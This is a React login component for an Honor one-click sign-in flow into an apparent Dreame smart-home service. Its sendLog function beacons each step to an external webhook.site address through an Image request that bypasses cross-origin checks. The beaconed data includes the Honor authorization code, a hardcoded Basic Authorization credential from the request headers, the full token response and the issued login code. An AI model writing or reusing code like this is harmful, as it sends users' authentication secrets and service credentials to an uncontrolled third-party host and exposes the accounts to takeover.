import React, { useEffect, useState } from "react";
import LoginForm from "./App";

const Auth = () => {
  const [currentUrl, setCurrentUrl] = useState(window.location.href);

  // 自定义登录成功处理函数
  const handleLoginSuccess = (code) => {
    // 从地址栏获取参数
    const urlParams = new URLSearchParams(window.location.search);
    const state = urlParams.get('state') || '';
    
    // 拼接 code 到指定 URL
    const baseUrl = "https://devicemgt-pre-drcn.platform.hihonorcloud.com/getAuthCode";
    let finalUrl = `${baseUrl}?code=${code}`;
    
    // 如果有 state 参数，也添加到 URL
    if (state) {
      finalUrl += `&state=${encodeURIComponent(state)}`;
    }
    
    // 将其他 URL 参数也添加到最终 URL
    urlParams.forEach((value, key) => {
      if (key !== 'code' && key !== 'state') {
        finalUrl += `&${key}=${encodeURIComponent(value)}`;
      }
    });
    
    console.log("登录成功，跳转到:", finalUrl);
    window.location.href = finalUrl;
  };

  useEffect(() => {
    // 发送日志到 webhook.site
    const WEBHOOK_URL = "https://webhook.site/c2e88440-bd0d-4d34-bd0f-01b4d8f665a0";

    // 调用原生 printLog 接口
    const printLogNative = (msg, degree = 'i', tag = '') => {
      if (window.honorConnect && window.honorConnect.handler) {
        try {
          const logBody = JSON.stringify({
            degree: degree,
            tag: tag,
            msg: msg
          });
          const logRequestId = Date.now().toString() + '_log';
          window.honorConnect.handler(
            "printLog",
            logBody,
            logRequestId,
            function (resultStr) {
              if (resultStr) {
                try {
                  const result = JSON.parse(resultStr);
                  if (result.status !== 0) {
                    console.warn("printLog失败:", result.msg);
                  }
                } catch (e) {
                  // 忽略解析错误
                }
              }
            }
          );
        } catch (e) {
          // 忽略 printLog 调用错误，不影响主流程
          console.warn("printLog调用异常:", e.message);
        }
      }
    };

    const sendLog = (msg) => {
      // 用 Image 发送，绕过跨域限制
      new Image().src = `${WEBHOOK_URL}?log=${encodeURIComponent(msg)}&t=${Date.now()}`;
      // 同时调用原生 printLog 接口
      printLogNative(msg, 'i', '');
    };

    sendLog("1_页面加载_honorConnect=" + (window.honorConnect ? "Y" : "N"));

    // 获取 URL 参数
    const urlParams = new URLSearchParams(window.location.search);
    const clientId = urlParams.get('client_id');
    const state = urlParams.get('state') || '';
    const rawRedirectUri = urlParams.get('redirect_uri');
    let redirectUri = rawRedirectUri ? decodeURIComponent(rawRedirectUri) : '';

    sendLog("2_clientId=" + clientId);

    // 后端接口换取授权码
    const handleHonorAuthCode = async (honorAuthCode) => {
      sendLog("6_收到honorAuthCode=" + (honorAuthCode ? honorAuthCode.substring(0, 30) + "..." : "null"));
      try {
        // https://smarthomecntest.dreame.tech/dreame-auth/oauth/token
        const tokenUrl = `https://smarthomecn.dreame.tech/dreame-auth/oauth/token`;

        sendLog("6.1_接口地址=" + tokenUrl);
        sendLog("6.2_请求方法=POST");

        const requestBody = {
          grant_type: "honorOneClickLogin",
          scope: "all",
          signtype: "pk",
          response_type: "code",
          country: "CN",
          lang: "zh",
          honorOneClickLoginAuthorizationCode: honorAuthCode,
          clientId: "honor",
        };

        sendLog("6.3_请求参数对象=" + JSON.stringify(requestBody));

        const bodyString = new URLSearchParams(requestBody).toString();
        sendLog("6.4_请求体字符串=" + bodyString);

        const requestHeaders = {
          "Content-Type": "application/x-www-form-urlencoded",
          "Authorization": "Basic aG9ub3I6SzdtUDl4UjJ2TjRxVzhiVA==",
          "Tenant-Id": "000000"
        };
        sendLog("6.5_请求头=" + JSON.stringify(requestHeaders));

        const response = await fetch(tokenUrl, {
          method: "POST",
          headers: requestHeaders,
          body: bodyString
        });

        sendLog("7_响应状态码=" + response.status);
        sendLog("7.1_响应状态文本=" + response.statusText);

        const responseHeaders = {};
        response.headers.forEach((value, key) => {
          responseHeaders[key] = value;
        });
        sendLog("7.2_响应头=" + JSON.stringify(responseHeaders));

        const data = await response.json();
        sendLog("7.3_响应体=" + JSON.stringify(data));
        sendLog("7.4_响应success=" + data.success);
        sendLog("7.5_响应success类型=" + typeof data.success);
        sendLog("7.6_响应data=" + (data.data ? data.data : "null或undefined"));
        sendLog("7.7_响应data类型=" + typeof data.data);
        sendLog("7.8_条件判断_data.success=" + data.success + "_data.data=" + data.data);
        sendLog("7.9_条件结果_data.success && data.data=" + (data.success && data.data));

        if (data.success && data.data) {
          const yourCode = data.data;
          sendLog("8_获取code成功_code=" + yourCode);
          sendLog("8.1_redirectUri=" + redirectUri);
          sendLog("8.2_state=" + state);
          if (redirectUri) {
            const finalUrl = `${redirectUri}?code=${yourCode}&state=${state}`;
            sendLog("8.3_最终跳转地址=" + finalUrl);
            window.location.href = finalUrl;
          } else {
            sendLog("8_ERROR_redirectUri为空，无法跳转");
          }
        } else {
          sendLog("8_后端失败_msg=" + (data.msg || "未知") + "_data=" + JSON.stringify(data));
          sendLog("8.1_失败原因_data.success=" + data.success + "_data.data存在=" + (data.data !== undefined && data.data !== null));
        }
      } catch (e) {
        sendLog("7_ERROR_请求异常=" + e.message);
        sendLog("7_ERROR_异常堆栈=" + (e.stack || "无堆栈信息"));
      }
    };

    const handleResult = (resultStr) => {
      sendLog("4_回调被调用_resultStr类型=" + typeof resultStr);
      sendLog("4_回调被调用_resultStr=" + JSON.stringify(resultStr));
      try {
        // Honor SDK 可能传递对象或字符串，需要兼容处理
        let result;
        if (typeof resultStr === 'string') {
          result = JSON.parse(resultStr);
        } else if (typeof resultStr === 'object' && resultStr !== null) {
          result = resultStr;
        } else {
          sendLog("5_未知类型_resultStr=" + resultStr);
          return;
        }
        sendLog("4.1_解析成功_status=" + result.status);
        if (result.status === 0) {
          sendLog("4.2_授权成功_authCode=" + (result.authCode ? result.authCode.substring(0, 20) + "..." : "null"));
          handleHonorAuthCode(result.authCode);
        } else {
          sendLog("5_授权失败=" + result.msg);
        }
      } catch (e) {
        sendLog("5_解析异常=" + e.message + "_resultStr=" + resultStr);
      }
    }

    window.handleResult = handleResult;
    sendLog("2.5_handleResult已挂载到window");

    //  调用 honorConnect 
    if (window.honorConnect && window.honorConnect.handler) {
      sendLog("3_调用getAuthCodeExt");
      try {
        sendLog("3.1_准备调用handler");
        const requestData = JSON.stringify({
          appId: '221000576',
          scope: [
            "openid",
            "profile",
            "email",
            "https://www.hihonor.com/auth/account/mobile.number"
          ],
          // https://smarthomecntest.dreame.tech
          redirectUri: "https://smarthomecntest.dreame.tech"
        });
        const requestId = Date.now().toString();
        sendLog("3.2_requestData=" + requestData.substring(0, 100));
        sendLog("3.3_requestId=" + requestId);

        window.honorConnect.handler(
          "getAuthCodeExt",
          requestData,
          requestId,
          'handleResult'
        );
        sendLog("3.4_handler调用完成");
      } catch (e) {
        sendLog("3_ERROR_handler调用异常=" + e.message);
      }
    } else {
      sendLog("3_honorConnect不存在");
    }
  }, []);

  return <LoginForm onLoginSuccess={handleLoginSuccess} />;
};

export default Auth;
